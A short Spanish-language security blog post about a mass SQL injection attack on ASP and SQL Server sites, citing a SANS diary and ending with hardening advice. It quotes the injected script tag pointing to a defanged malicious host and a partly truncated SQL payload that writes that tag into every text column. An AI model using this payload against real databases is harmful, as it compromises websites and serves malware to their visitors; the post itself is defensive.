Encontramos un hack que esta ocurriendo frecuentemente en sitios web, en principio bajo ASP y SQL Server. El mismo injecta código que intenta redirigir los links que tengamos hacia sitios maliciosos.

Fuente: http://isc.sans.edu/diary.html?storyid=12127

Se injecta lo siguiente, en varias de las tablas que tengamos.

“></title><script src=”hXXp://lilupophilupop.com/sl.php”></script>

El Script que se corre, segun la fuente que cito es:

declare+@s+varchar(4000)+set+@s=cast(0xset ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in (‘——SNIP——-
IN EXEC(‘UPDATE [‘+@T+’] SET [‘+@C+’]=””></title><script src=”XXXX://lilupophilupop.com/sl.php”></script><!–”+RTRIM(CONVERT(VARCHAR(6000),[‘+@C+’])) where LEFT(RTRIM(CONVERT(VARCHAR(6000),[‘+@C+’])),17)<>””></title><script” ‘) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor+…………….

La primer solución puede ser revisar nuestro usuario de SQL para revisar que tenga solo permisos de datareader y datawriter, y crear un Role para ejecutar Stored Procedures.

Luego, tenemos que revisar nuestra aplicación para analizar todos los inputs de información que tenemos.